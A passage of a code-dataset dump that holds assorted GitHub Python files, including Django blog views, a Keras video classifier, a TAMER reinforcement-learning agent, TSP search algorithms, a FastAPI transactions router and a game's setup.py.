help_text=b'represents a branch revision that is a starting point of this branch.', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='branch',\n name='project_ref',\n field=models.ForeignKey(help_text=b'project reference', to='repository.Project'),\n preserve_default=True,\n ),\n ]\n","repo_name":"smartinov/fennec","sub_path":"fennec/apps/repository/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"1935206916","text":"import os\nimport math\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nfrom tf_utils import input_fn_from_dataset,input_fn_frame_from_dataset,save_tf_record,prob_positive_class_from_prediction\nfrom get_data import get_videos_from_folder,get_target_from_csv\nfrom utils import save_solution\nfrom data_manage import sliding_training_data, flip, normalize_data, extend_videos\nfrom sklearn.metrics import roc_auc_score\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import KFold\nfrom tensorflow.keras.applications.vgg16 import VGG16\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ntrain_folder = os.path.join(dir_path,\"../train/\")\ntest_folder = os.path.join(dir_path,\"../test/\")\n\ntrain_target = os.path.join(dir_path,'../train_target.csv')\nmy_solution_file = os.path.join(dir_path,'../solution.csv')\n\nx_train = get_videos_from_folder(train_folder)\ny_train = get_target_from_csv(train_target)\nx_test = get_videos_from_folder(test_folder)\n\n# Make into -1 to 1 range\nx_train = normalize_data(x_train)\nx_test = normalize_data(x_test)\n\n# Extend videos so that they are all the same length (216, 100, 100)\nx_train = extend_videos(x_train)\nx_test = extend_videos(x_test)\nx_train = x_train.reshape((x_train.shape[0], x_train[0].shape[0], x_train[0].shape[1], x_train[0].shape[2], 1))\nx_test = x_test.reshape((x_test.shape[0], x_test[0].shape[0], x_test[0].shape[1], x_test[0].shape[2], 1))\nprint(x_train.shape)\n\n# Split into training and validation\nnum_training = math.floor(x_train.shape[0] * 0.9)\nindices = np.random.permutation(x_train.shape[0])\ntraining_idx, validation_idx = indices[:num_training], indices[num_training:]\ntraining_x = x_train[training_idx]\nvalidation_x = x_train[validation_idx]\ntraining_y = y_train[training_idx]\nvalidation_y = y_train[validation_idx]\n\ncnn = keras.Sequential()\ncnn.add(keras.layers.InputLayer(input_shape=(100, 100, 1)))\ncnn.add(keras.layers.Conv2D(32, 3, strides=(2,2), activation=tf.nn.relu, padding='same'))\ncnn.add(keras.layers.Conv2D(64, 3, strides=(2,2), activation=tf.nn.relu, padding='same'))\ncnn.add(keras.layers.Flatten())\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.TimeDistributed(cnn, input_shape=(216, 100, 100, 1)))\nmodel.add(keras.layers.LSTM(128))\nmodel.add(keras.layers.Dense(2, activation=tf.nn.softmax))\n\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy')\nmodel.fit(training_x, training_y, epochs=10)\n\n\n# Validate\npred = model.predict(validation_x)\nprobs_pos = [prob[1] for prob in pred]\nprobs_pos = np.asarray(probs_pos)\nroc_auc = roc_auc_score(validation_y, probs_pos)\nprint(roc_auc)\n\n# Save submission\npredictions = model.predict(x_test)\nsolution = [prob[1] for prob in predictions]\nsave_solution(my_solution_file, solution)\n\n","repo_name":"ivantishchenko/aml-projects","sub_path":"task4/jonathan/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29291530397","text":"from django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.utils import timezone\nfrom django.shortcuts import get_object_or_404\n\nfrom .models import Post\nfrom .forms import PostForm\n\n\ndef post_list(request):\n context = {\n # 'post_list': Post.objects.filter(\n # published_date__lte=timezone.now()\n # ),\n 'post_list': Post.objects.all()\n }\n return render(request, 'blog/post-list.html', context)\n\n\ndef post_detail(request, post_id):\n # try:\n # # ORM을 이용해서 id가 전달받은 post_id와 일치하는 Post��체를 post변수에 할당\n # post = Post.objects.get(id=post_id)\n # except Post.DoesNotExist as e:\n # return HttpResponse(e)\n\n post = get_object_or_404(Post, id=post_id)\n\n # 전달할 context 딕셔너리 키 'post'에 post 변수를 전달\n context = {\n 'post': post,\n }\n # blog/post-detail.html 템플릿을 render한 결과를 리턴\n return render(request, 'blog/post-detail.html', context)\n\n\ndef post_add(request):\n if request.method == 'POST':\n # 요청의 method가 POST일 경우\n # 요청받은 데이터를 출력\n data = request.POST\n # html의 name이 키값\n\n\n # PostForm에 data인자로 request.POST 데이터를 전달해준다\n form = PostForm(data=request.POST)\n # title = data['input_title']\n # content = data['input_content']\n author = User.objects.get(id=1)\n # print(request.POST)\n # ret = ','.join([title, content])\n\n # 만약 PostForm객체가 유효할 경우(전달된 데이터의 형식이 PostForm 에 정의한 형식과과 맞을 경우)\n if form.is_valid():\n title = form.cleaned_data['title']\n content = form.cleaned_data['content']\n\n # 받은 데이터를 사용해세 Post 객체를 생성\n p = Post(title=title, content=content, author=author)\n p.save()\n\n else:\n return HttpResponse('Form invalid {}'.format(form.errors))\n\n # redirect메서드는 인자로 주어진\n # URL 또는\n # urlpattern의 name을 이용해 만들어낸 URL을 사용해서\n # 브라우저가 해당 URL로 이동하도록 해줌\n # 브라우저가 해당 URL로 이동하도록 해줌\n # return redirect('post_list')\n\n # 글 상세화면으로 이동 키워드(post_id)의 인자로 p.id를 전달\n return redirect('post_detail', post_id=p.id)\n\n\n else:\n # PostForm형 객체를 만들어 context에 할당\n form = PostForm()\n context = {\n 'form': form,\n }\n # 요청의 method가 POST가 아닐 경우\n # 글 쓰기 양식이 있는 템플릿을 렌더해서 리턴\n return render(request, 'blog/post-add.html', context)\n","repo_name":"pinstinct/django-girls-tutorial-class","sub_path":"django_app/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4306552096","text":"import imp\nimport os.path\nimport sys\nfrom setuptools import setup, find_packages\n\nadditional_dlls = [\n 'pygame/SDL_ttf.dll',\n 'pygame/libvorbis-0.dll',\n 'pygame/libvorbisfile-3.dll',\n 'pygame/libfreetype-6.dll',\n 'pygame/SDL_mixer.dll',\n 'pygame/libogg-0.dll',\n]\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\ntrosnoth_version = imp.load_source('trosnoth.version', os.path.join(\n here, 'trosnoth', 'version.py')).version\n\n\ndef main():\n if 'py2exe' in sys.argv:\n import py2exe\n\n # Make sure py2exe knows which data files to include.\n paths = [\n\t 'trosnoth/data',\n 'trosnoth/data/achievements',\n 'trosnoth/data/blocks',\n 'trosnoth/data/blocks/custom',\n 'trosnoth/data/config',\n 'trosnoth/data/fonts',\n 'trosnoth/data/music',\n 'trosnoth/data/sound',\n 'trosnoth/data/sprites',\n 'trosnoth/data/startupMenu',\n 'trosnoth/data/statGeneration',\n 'trosnoth/data/themes',\n 'trosnoth/data/themes/pirate',\n 'trosnoth/data/themes/pirate/blocks',\n 'trosnoth/data/themes/pirate/config',\n 'trosnoth/data/themes/pirate/fonts',\n 'trosnoth/data/themes/pirate/sprites',\n 'trosnoth/data/themes/pirate/startupMenu',\n 'trosnoth/data/web',\n ]\n\n data = []\n for path in paths:\n files = []\n for filename in os.listdir(path):\n if filename in ('__init__.py', '__init__.pyc'):\n continue\n fn = os.path.join(path, filename)\n if os.path.isfile(fn):\n files.append(fn)\n data.append((path, files))\n\n moreargs = {\n 'console': [\n {'script': 'scripts/trosnoth',\n 'icon_resources': [(1, 'wininstall/icon.ico')]\n },\n 'scripts/trosnoth-server',\n ],\n 'data_files': data,\n 'options': {\n 'py2exe': {\n 'includes': 'zope.interface,pygame._view,trosnoth.bots.john,trosnoth.bots.ranger',\n },\n },\n }\n else:\n moreargs = {}\n\n setup(name = 'trosnoth',\n version = trosnoth_version,\n description = 'Trosnoth network platform game',\n author = 'J.D. Bartlett et al',\n author_email = 'josh@trosnoth.org',\n url = 'http://www.trosnoth.org/',\n packages=find_packages(exclude=['test']),\n\n # Mapping says which files each package needs.\n package_data = {\n 'trosnoth.data.blocks': ['*.block', '*.png', '*.bmp'],\n 'trosnoth.data.fonts': ['*.ttf', '*.TTF', '*.txt'],\n 'trosnoth.data.music': ['*.ogg'],\n 'trosnoth.data.sound': ['*.ogg'],\n 'trosnoth.data.sprites': ['*.png', '*.bmp'],\n 'trosnoth.data.startupMenu': ['*.png', '*.txt'],\n 'trosnoth.data.statGeneration': ['*.htm'],\n 'trosnoth.data.themes': ['pirate/info.txt',\n 'pirate/blocks/*.png', 'pirate/config/*.cfg',\n 'pirate/fonts/*', 'pirate/sprites/*',\n 'pirate/startupMenu/*'],\n 'trosnoth.data': [\n 'config/*.cfg', 'achievements/*.png', 'web/*.png',\n 'pathfinding.db'],\n 'trosnoth': ['gpl.txt']\n },\n\n scripts = ['scripts/trosnoth', 'scripts/trosnoth-server'],\n long_description = 'Trosnoth is a very very addictive and fun network team game.' ,\n\n install_requires = [\n 'pygame',\n 'twisted>=15.0',\n ],\n\n classifiers = [\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: MacOS X',\n 'Environment :: Win32 (MS Windows)',\n 'Environment :: X11 Applications',\n 'Framework :: Twisted',\n 'Intended Audience :: End Users/Desktop',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Games/Entertainment :: Arcade',\n 'Topic :: Games/Entertainment :: Side-Scrolling/Arcade Games',\n ],\n **moreargs\n ) \n\n\nif __name__ == '__main__':\n main()\n","repo_name":"iliescufm/pygame","sub_path":"trosnoth-1.10.0/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72417317049","text":"'''\nThis demo of a TAMER algorithm implmented with HIPPO Gym has been adapted\nfrom code provided by Calarina Muslimani of the Intelligent Robot Learning Laboratory\nTo use this code with the default setup simply rename this file to agent.py\n'''\n\nimport gym\nimport time\nimport numpy as np\nimport itertools\n\n\n#This is the code for tile coding features\nbasehash = hash\n\nclass IHT:\n \"Structure to handle collisions\"\n def __init__(self, sizeval):\n self.size = sizeval \n self.overfullCount = 0\n self.dictionary = {}\n\n def __str__(self):\n \"Prepares a string for printing whenever this object is printed\"\n return \"Collision table:\" + \" size:\" + str(self.size) + \" overfullCount:\" + str(self.overfullCount) + \" dictionary:\" + str(len(self.dictionary)) + \" items\"\n\n def count (self):\n return len(self.dictionary)\n \n def fullp (self):\n return len(self.dictionary) >= self.size\n \n def getindex (self, obj, readonly=False):\n d = self.dictionary\n if obj in d: return d[obj]\n elif readonly: return None\n size = self.size\n count = self.count()\n if count >= size:\n if self.overfullCount==0: print('IHT full, starting to allow collisions')\n self.overfullCount += 1\n return basehash(obj) % self.size\n else:\n d[obj] = count\n return count\n\ndef hashcoords(coordinates, m, readonly=False):\n if type(m)==IHT: return m.getindex(tuple(coordinates), readonly)\n if type(m)==int: return basehash(tuple(coordinates)) % m\n if m==None: return coordinates\n\nfrom math import floor, log\nfrom itertools import zip_longest\n\ndef tiles (ihtORsize, numtilings, floats, ints=[], readonly=False):\n \"\"\"returns num-tilings tile indices corresponding to the floats and ints\"\"\"\n qfloats = [floor(f*numtilings) for f in floats]\n Tiles = []\n for tiling in range(numtilings):\n tilingX2 = tiling*2\n coords = [tiling]\n b = tiling\n for q in qfloats:\n coords.append( (q + b) // numtilings )\n b += tilingX2\n coords.extend(ints)\n Tiles.append(hashcoords(coords, ihtORsize, readonly))\n return Tiles\n\ndef tileswrap (ihtORsize, numtilings, floats, wrapwidths, ints=[], readonly=False):\n \"\"\"returns num-tilings tile indices corresponding to the floats and ints, wrapping some floats\"\"\"\n qfloats = [floor(f*numtilings) for f in floats]\n Tiles = []\n for tiling in range(numtilings):\n tilingX2 = tiling*2\n coords = [tiling]\n b = tiling\n for q, width in zip_longest(qfloats, wrapwidths):\n c = (q + b%numtilings) // numtilings\n coords.append(c%width if width else c)\n b += tilingX2\n coords.extend(ints)\n Tiles.append(hashcoords(coords, ihtORsize, readonly))\n return Tiles\n\n\nclass MountainCarTileCoder:\n def __init__(self, iht_size=4096, num_tilings=8, num_tiles=8):\n \"\"\"\n Initializes the MountainCar Tile Coder\n \n iht_size -- int, the size of the index hash table, typically a power of 2\n num_tilings -- int, the number of tilings\n num_tiles -- int, the number of tiles. Here both the width and height of the\n tile coder are the same\n \"\"\"\n self.iht = IHT(iht_size)\n self.num_tilings = num_tilings\n self.num_tiles = num_tiles\n \n def get_tiles(self, position, velocity):\n \"\"\"\n Takes in a position and velocity from the mountaincar environment\n and returns a numpy array of active tiles.\n \n returns:\n tiles - np.array, active tiles\n \"\"\"\n # Use the ranges above and self.num_tiles to scale position and velocity to the range [0, 1]\n # then multiply that range with self.num_tiles so it scales from [0, num_tiles]\n minP=-1.2\n maxP=.5\n minV=-.07\n maxV=.07\n scaleP= maxP- minP\n scaleV= maxV-minV\n \n position_scaled = ((position-minP)/(scaleP))*self.num_tiles\n \n velocity_scaled = ((velocity-minV)/(scaleV))*self.num_tiles\n \n \n # get the tiles using tc.tiles, with self.iht, self.num_tilings and [scaled position, scaled velocity]\n # nothing to implment here\n mytiles = tiles(self.iht, self.num_tilings, [position_scaled, velocity_scaled])\n \n return np.array(mytiles)\n\n\n#this is the tamer agent class\n\nclass TamerAgent:\n \"\"\"\n Initialization of Tamer Agent. All values are set to None so they can\n be initialized in the agent_init method.\n \"\"\"\n def __init__(self):\n \n \n self.last_action = None\n self.previous_tiles = None\n self.first_state= None\n self.current_action = None\n self.current_tiles= None\n \n self.num_tilings = 8\n self.num_tiles = 8\n self.iht_size = 4096\n self.epsilon = 0.01\n self.x = .08\n self.alpha =self.x/self.num_tilings #this is step size\n self.num_actions = 3\n self.actions = list(range(self.num_actions))\n self.time_step=0\n self.experiences= list()\n self.max_n_experiences=1000\n self.window_size=1\n \n \n # We initialize self.w to three times the iht_size. Recall this is because\n # we need to have one set of weights for each action.\n self.w = np.ones((self.num_actions, self.iht_size))\n \n # We initialize self.mctc to the mountaincar verions of the\n # tile coder that we created\n \n self.mctc = MountainCarTileCoder(iht_size=self.iht_size,\n num_tilings=self.num_tilings,\n num_tiles=self.num_tiles)\n \n def argmax(self, q_values):\n \"\"\"argmax with random tie-breaking\n Args:\n q_values (Numpy array): the array of action values\n Returns:\n action (int): an action with the highest value\n \"\"\"\n top = float(\"-inf\")\n ties = []\n \n for i in range(len(q_values)):\n if q_values[i] > top:\n top = q_values[i]\n ties = []\n \n if q_values[i] == top:\n ties.append(i)\n \n return np.random.choice(ties)\n\n def select_greedy_action(self, tiles):\n \"\"\"\n Selects an action using greedy\n Args:\n tiles - np.array, an array of active tiles\n Returns:\n (chosen_action, action_value) - (int, float), tuple of the chosen action\n and it's value\n \"\"\"\n action_values = []\n chosen_action = None\n \n for a in range(self.num_actions):\n action_values.append(np.sum(self.w[a][tiles]))\n # First loop through the weights of each action and populate action_values\n # with the action value for each action and tiles instance\n \n if np.random.random() < self.epsilon:\n chosen_action = np.random.choice(self.actions)\n else:\n chosen_action = self.argmax(action_values)\n \n return chosen_action\n \n def action_selection(self, state):\n position, velocity = state\n active_tiles=self.mctc.get_tiles(position, velocity)\n current_action=self.select_greedy_action(active_tiles)\n self.current_action = current_action\n self.current_tiles = np.copy(active_tiles)\n \n \n def agent_start(self, state):\n \"\"\"The first method called when the experiment starts, called after\n the environment starts.\n Args:\n state (Numpy array): the state observation from the\n environment's evn_start function.\n Returns:\n The first action the agent takes.\n \"\"\"\n position, velocity = state\n \n active_tiles=self.mctc.get_tiles(position, velocity)\n \n self.current_action = np.random.choice(self.actions)\n self.current_tiles= np.copy(active_tiles)\n \n self.experiences.append((self.current_action, self.current_tiles, time.time()))\n return self.current_action\n\n \n def update_reward_function(self, reward):\n \n if reward == 'good':\n r = 1\n elif reward == 'reallygood':\n r = 4\n elif reward == 'bad':\n r = -1\n\n elif reward == 'None':\n return\n\n\n current_time = time.time()\n while len(self.experiences) > 0:\n experience = self.experiences[0]\n \n #diff= current_time-experience[2]\n\n #if (diff < .2 or diff > 2):\n \n if experience[2] < current_time - self.window_size: #\n self.experiences.pop(0)\n \n else:\n break\n\n# update weights using Algorithm 1 in paper\n n_experiences = len(self.experiences)\n\n if n_experiences== 0:\n return\n weight_per_experience = 1.0/n_experiences\n cred_features = np.zeros((self.num_actions, self.iht_size))\n \n for experience in self.experiences:\n exp_features= np.zeros((self.num_actions, self.iht_size))\n exp_features[experience[0]][experience[1]]=1\n \n exp_features*=weight_per_experience\n cred_features = np.add(cred_features, exp_features)\n \n error = r - self.w * cred_features\n self.w += (.01*error*cred_features)\n\n\n# Original HIPPO Gym Agent\n\n'''\nThis is a demo file to be replaced by the researcher as required.\nThis file is imported by trial.py and trial.py will call:\nstart()\nstep()\nrender()\nreset()\nclose()\nThese functions are mandatory. This file contains minimum working versions\nof these functions, adapt as required for individual research goals.\n'''\n\nclass Agent():\n '''\n Use this class as a convenient place to store agent state.\n '''\n\n def start(self, game:str):\n '''\n Starts an OpenAI gym environment.\n Caller:\n - Trial.start()\n Inputs:\n - game (Type: str corresponding to allowable gym environments)\n Returs:\n - env (Type: OpenAI gym Environment as returned by gym.make())\n Mandatory\n '''\n self.tamer = true\n if self.tamer:\n np.random.seed(0)\n self.tamerAgent = TamerAgent()\n self.env = gym.make(game)\n return\n\n def step(self, action, reward):\n '''\n Takes a game step.\n Caller:\n - Trial.take_step()\n Inputs:\n - env (Type: OpenAI gym Environment)\n - action (Type: int corresponding to action in env.action_space)\n Returns:\n - envState (Type: dict containing all information to be recorded for future use)\n change contents of dict as desired, but return must be type dict.\n '''\n if self.tamer:\n if self.tamerAgent.time_step == 0:\n self.tamerAgent.agent_start(self.tamerAgent.first_state)\n time.sleep(1.5)\n\n self.tamerAgent.time_step += 1\n self.tamerAgent.update_reward_function(reward)\n self.tamerAgent.last_action = self.tamerAgent.current_action\n self.tamerAgent.previous_tiles = self.tamerAgent.current_tiles\n\n if reward != 'None':\n updated = True\n else:\n updated = False\n\n observation, reward, done, info = self.env.step(self.tamerAgent.current_action)\n action = self.tamerAgent.current_action\n else:\n observation, reward, done, info = self.env.step(action)\n\n envState = {'observation': observation, 'reward': reward, 'done': done, 'info': info, 'agentAction': action}\n\n if self.tamer:\n self.tamerAgent.action_selection(observation)\n self.tamerAgent.experiences.append((self.tamerAgent.current_action, self.tamerAgent.current_tiles, time.time()))\n return envState\n\n def render(self):\n '''\n Gets render from gym.\n Caller:\n - Trial.get_render()\n Inputs:\n - env (Type: OpenAI gym Environment)\n Returns:\n - return from env.render('rgb_array') (Type: npArray)\n must return the unchanged rgb_array\n '''\n return self.env.render('rgb_array')\n\n def reset(self):\n '''\n Resets the environment to start new episode.\n Caller:\n - Trial.reset()\n Inputs:\n - env (Type: OpenAI gym Environment)\n Returns:\n No Return\n '''\n if self.tamer:\n self.tamerAgent.time_step=0\n self.tamerAgent.first_state = self.env.reset()\n else:\n self.env.reset()\n\n def close(self):\n '''\n Closes the environment at the end of the trial.\n Caller:\n - Trial.close()\n Inputs:\n - env (Type: OpenAI gym Environment)\n Returns:\n No Return\n '''\n self.env.close()\n\n","repo_name":"IRLL/HIPPO_Gym","sub_path":"App/tamerAgent.py","file_name":"tamerAgent.py","file_ext":"py","file_size_in_byte":13295,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"20355078705","text":"#!/usr/bin/env python\n\n# heuristic_search/astar.py\n# CS440: Project 1 - Heuristic Search\n# Authors: Matthew Chan and Jeremy Savarin\n\nimport random\n#import queue # contains priority queue for astar\nimport sys\nimport time\nimport math\nfrom my_pq import My_PQ\n\n\ndef invert(current, num_cities):\n l = []\n for i in range(num_cities):\n if i not in current:\n l.append(i)\n\n return l\n\n\n\ndef astar_tsp(city_list, adj, tb=False):\n # setup\n inf = float('inf')\n num_cities = len(city_list)\n counter = 0\n\n\n visited = set()\n fringe = My_PQ()\n\n # (f-val, ((visited),g)\n fringe.put( (0, (tuple([0]), 0)) )\n\n start_t = time.clock()\n\n while not fringe.empty():\n # get from fringe and expand\n node = fringe.get()\n current = node[1][0]\n g_val = node[1][1]\n #print(current)\n\n if time.clock() - start_t > 600: # 10 min\n return (len(visited), 0)\n\n # not consistent, so may go over\n if len(current) > num_cities+1:\n continue\n if current in visited:\n continue\n visited.add(current)\n\n # check for the goal (g)\n if len(current) == num_cities+1:\n if(current[-1] == 0):\n for i in range(len(current)):\n if i not in current:\n continue\n if tb: return (len(visited), 1)\n return current\n\n\n # get neighbors, add to fringe (calc f value)\n for i in range(num_cities):\n if len(current) == num_cities:\n if i > 0:\n continue\n elif i in current:\n continue\n\n neighbor = current + tuple([i])\n unvisited = invert(current, num_cities) #faster?\n\n h_val = prim(unvisited, adj) + find_closest(0, unvisited, adj)\n #h_val = find_closest(i, unvisited, adj)\n new_g = g_val + adj[current[-1]][i]\n f_val = new_g + h_val\n\n fringe.put((f_val, (neighbor, new_g)))\n\n return (len(visited), 0) #No path\n\ndef generate_tsp(cities, rand_state=None):\n\n if rand_state != None:\n random.seed(rand_state)\n\n l = [] # list\n c_list = set()\n rand = random.randrange # localizing function\n for i in range(cities):\n while True:\n x = rand(100)\n y = rand(100)\n if (x,y) not in c_list:\n break\n l.append((i, (x, y)))\n c_list.add((x,y))\n\n return l\n\ndef init_adj(cities): # create adjacency matrix\n num = len(cities)\n inf = float('inf')\n res = [[0 for i in range(num)] for j in range(num)]\n \n for i in range(num):\n for j in range(num):\n res[i][j] = calc_dist(cities[i][1], cities[j][1])\n res[j][i] = res[i][j]\n\n for i in range(num):\n res[i][i] = inf\n\n return res\n\ndef calc_dist(a, b):\n return ((a[0]-b[0])**2 + (a[1]-b[1])**2)**.5\n\ndef closest(a, adj):\n return min(adj[a][:])\n\ndef find_closest(a, others, adj):\n min_dist = 1000\n closest = -1\n for i in others:\n if adj[a][i] < min_dist:\n min_dist = adj[a][i]\n closest = i\n return closest\n\ndef prim(cities, adj, retmst=False): #cities is list of ints\n\n if len(cities) == 0:\n return 0\n\n mst_set = set()\n mst = []\n mst_dist = 0\n\n city = cities.pop()\n mst_set.add(city)\n while len(cities) > 0:\n\n min_edge = float('inf')\n addition = None\n for i in mst_set:\n for j in cities:\n if adj[i][j] < min_edge:\n min_edge = adj[i][j]\n addition = (i,j)\n\n\n mst_dist += min_edge\n mst.append(addition)\n mst_set.add(addition[1])\n cities.remove(addition[1])\n\n #print(mst)\n if retmst:\n return (mst, mst_dist)\n return mst_dist\n\ndef print_tsp_grid(cities):\n\n l = []\n for city in cities:\n l.append(city[1])\n\n\n dim = 100\n\n print('\\t+' + '-'*dim + '+')\n\n y = 0\n while y < dim:\n print(str(y) + '\\t|', end='')\n\n x = 0\n while x < dim:\n if (x,y) in l:\n city = str(l.index((x,y)))\n print(city, end='')\n x+=len(city)\n else:\n print('.', end='')\n x += 1\n\n print('|')\n y += 1\n\n print('\\t+' + '-'*dim + '+')\n\ndef testbench(number):\n\n for i in range(25):\n cities = generate_tsp(number, rand_state=i)\n adj = init_adj(cities)\n start_t = time.clock()\n expanded, success = astar_tsp(cities, adj, tb=True)\n stop_t = time.clock()\n print(\"%d\\t%d\\t%d\\t%f\" % (number, success, expanded, stop_t-start_t))\n\ndef local_tsp_init(cities):\n num_cities = len(cities)\n tour = []\n l = [i for i in range(num_cities)]\n random.shuffle(l)\n for i in range(num_cities-1):\n tour.append((l[i], l[i+1]))\n tour.append((l[-1], l[0]))\n\n return tour\n #num_cities = len(cities)\n #tour = [i for i in range(num_cities)]\n #random.shuffle(tour)\n\ndef local_tsp(tour, adj, tb=False, t=600, early=False):\n annealing = .50\n decrease = .01\n dec_iter = 50\n dist = 0\n new_dist = 0\n min_dist = float('inf')\n iters = 0\n num_c = 4 * len(tour) ** 2\n\n start_t = time.clock()\n\n counter = 0\n while (time.clock() - start_t) < t:\n\n success, new_dist = eval_swap(tour, adj, annealing)\n\n if counter % dec_iter == (dec_iter-1):\n annealing -= decrease\n if annealing < 0:\n annealing = 0\n\n if new_dist < dist:\n min_dist = new_dist\n iters = counter\n\n if early and annealing==0:\n if (counter-iters>num_c) and (dist > min_dist or math.isclose(dist, min_dist)):\n return tour, dist, (iters, min_dist, counter)\n\n dist = new_dist\n #print(dist)\n\n\n counter += 1\n\n #print(iters, min_dist)\n return tour, dist, (iters, min_dist, counter)\n\n\n\ndef swap_edges(tour, show_only=False):\n num_cities = len(tour)\n a=0\n b=0\n while True:\n a = random.randrange(num_cities)\n b = random.randrange(num_cities)\n if 2 < abs(a - b) < (num_cities-1):\n break;\n\n if show_only:\n return (a, b)\n\n e1 = tour[a]\n e2 = tour[b]\n n1 = (e1[0], e2[0])\n n2 = (e1[1], e2[1])\n\n tour.remove(e1)\n tour.remove(e2)\n tour.append(n1)\n tour.append(n2)\n\ndef eval_tour(tour, adj):\n dist = 0\n for e in tour:\n dist += adj[e[0]][e[1]]\n\n return dist\n\ndef eval_swap(tour, adj, anneal):\n dist = eval_tour(tour, adj)\n a, b = swap_edges(tour, show_only=True)\n e1 = tour[a]\n e2 = tour[b]\n n1 = (e1[0], e2[0])\n n2 = (e1[1], e2[1])\n new_dist = dist - adj[e1[0]][e1[1]] - adj[e2[0]][e2[1]] \\\n + adj[n1[0]][n1[1]] + adj[n2[0]][n2[1]]\n \n if new_dist < ((1+anneal)*dist):\n tour.remove(e1)\n tour.remove(e2)\n tour.append(n1)\n tour.append(n2)\n return (True, new_dist)\n \n return (False, dist)\n\ndef eval_set_tour(tour, adj):\n dist = 0\n for i in range(len(tour)-2):\n dist += adj[i][i+1]\n\n return dist\n\ndef local_testbench(number, t=60, e=False):\n for i in range(25):\n cities = generate_tsp(number, rand_state=i)\n adj = init_adj(cities)\n for j in range(3):\n tour = local_tsp_init(cities)\n start_t = time.clock()\n tour, dist, xtra = local_tsp(tour, adj, t=t, early=e)\n stop_t = time.clock()\n print(\"%d\\t%d\\t%d\\t%f\\t%f\\t%d\\t%f\" % (i, j, number, dist, xtra[1], xtra[2], stop_t-start_t))\n\ndef local_testbench_var(number, t=60, e=False): #variation\n cities = generate_tsp(number, rand_state=9001)\n for i in range(25):\n adj = init_adj(cities)\n tour = local_tsp_init(cities)\n start_t = time.clock()\n tour, dist, xtra = local_tsp(tour, adj, t=t, early=e)\n stop_t = time.clock()\n print(\"%d\\t%f\\t%f\\t%d\\t%f\" % (number, dist, xtra[1], xtra[2], stop_t-start_t))\n\n\n\nif __name__ == \"__main__\":\n\n #testbench(10)\n #local_testbench_var(25, t=10, e=True)\n local_testbench(int(sys.argv[1]), t=10, e=True)\n\n #cities = generate_tsp(10, rand_state=0)\n #print(cities)\n #adj = init_adj(cities)\n #start_t = time.clock()\n #result = astar_tsp(cities, adj, tb=False)\n #print(\"astar:\", result, eval_set_tour(result, adj))\n\n #cities = generate_tsp(50, rand_state=1)\n #print(cities)\n #adj = init_adj(cities)\n #tour = local_tsp_init(cities)\n ##print(tour, eval_tour(tour, adj))\n ##swap_edges(tour)\n ##print(tour, eval_tour(tour, adj))\n #t, dist, xtra = local_tsp(tour, adj)\n #print(\"local:\", tour, dist, xtra)\n\n #stop_t = time.clock()\n\n\n","repo_name":"mchan133/genetic-algorithm","sub_path":"heuristic-search-modified/heuristic_search/local_astar.py","file_name":"local_astar.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19335582089","text":"from fastapi import APIRouter, status, HTTPException\nfrom transaction import Transaction\nimport DBqueries as db\n\n\ntransactions_route = APIRouter()\n\n@transactions_route.get('/transactions', status_code=status.HTTP_200_OK)\ndef get_transactions(category = None):\n \n if(category):\n return db.get_transactions_by_category(category)\n else:\n try:\n return db.get_all_transactions()\n except:\n raise HTTPException(status_code = status.HTTP_400_BAD_REQUEST, detail=\"Bad request: transactions were not fetched\")\n\n \n\n@transactions_route.post('/transactions', status_code=status.HTTP_201_CREATED)\ndef add_transaction(transaction: Transaction):\n\n if transaction.amount > 5000:\n raise HTTPException(status_code=status.HTTP_406_NOT_ACCEPTABLE, detail=\"Transactions larger than 5000$ are not allowed\")\n else:\n db.insert_transaction(transaction) \n\n\n@transactions_route.delete('/transactions/{id}', status_code=status.HTTP_200_OK)\nasync def remove_transaction(id: int):\n exist = False\n exist = db.check_transaction_existence(id)\n if exist == True:\n db.delete_transaction(id)\n return {\"result\": f\"transaction {id} deleted\"}\n else:\n raise HTTPException(status_code = status.HTTP_404_NOT_FOUND, detail='transaction does not exist in the database') \n","repo_name":"eladshachar/bank","sub_path":"backend/routes/transactions_router.py","file_name":"transactions_router.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22556421381","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @author: SaltFish\n# @file: 34二叉树中和为某一值的路径.py\n# @date: 2020/07/18\n\"\"\"\n输入一棵二叉树和一个整数,打印出二叉树中节点值的和为输入整数的所有路径。从树的根节点开始往下一直到叶节点所经过的节点形成一条路径。\n\n示例:\n给定如下二叉树,以及目标和 sum = 22,\n\n 5\n / \\\n 4 8\n / / \\\n 11 13 4\n / \\ / \\\n 7 2 5 1\n返回:\n[\n [5,4,11,2],\n [5,8,4,5]\n]\n\n深度优先搜索,剪枝\n\"\"\"\nfrom typing import List\n\n\n# Definition for a binary tree node.\nclass 